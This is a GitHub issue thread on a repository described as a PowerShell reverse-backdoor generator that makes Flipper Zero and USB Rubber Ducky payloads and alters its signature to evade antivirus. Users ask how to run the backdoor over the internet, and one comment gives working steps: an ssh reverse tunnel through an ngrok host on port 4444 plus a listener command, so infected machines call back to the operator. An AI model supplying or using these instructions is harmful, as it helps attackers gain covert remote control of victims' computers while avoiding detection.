Drew-Alleman / powershell-backdoor-generator

Reverse backdoor written in PowerShell and obfuscated with Python. It generates payloads for popular hacking devices like Flipper Zero and Hak5 USB Rubber Ducky, and changes its signature after every build to help avoid AV.
Apache License 2.0
325 stars 56 forks source link

NGROK #6

Open MarKaliGG opened 7 months ago

MarKaliGG commented 7 months ago

Hi, can i use tools like ngrok? How can i set ip and port?

MarKaliGG commented 7 months ago

if i write python listen.py -i myipaddress -p portgivemengrok --flipper output name --payload execute give me some bad error. how can i use this back over the wan?

MarKaliGG commented 7 months ago

any help? Plz sweet heart i know you are here to help me

MarKaliGG commented 7 months ago

Im still here , pls let me know how its work

Akanni6465 commented 7 months ago

contact ngrok support

Drew-Alleman commented 7 months ago

Hi,

Are you just trying to host the remote payload using ngrok, or are you also trying to use the ngrok IP to connect back to the backdoor?

Best, Drew

schieferzahn commented 6 months ago

What if you want to do both?

theGreyOnceler commented 4 months ago

the .ps1 IP/Port needs to point to NGROK IP and whatever port you want to use.

start NGROK connection: ssh -R 4444:127.0.0.1:4444 v2@connect.ngrok-agent.com tcp

python ./listen.py --ip-address 127.0.0.1 -p 4444 -A

backdoor will look to ngrok and traffic will get forwarded to your machine.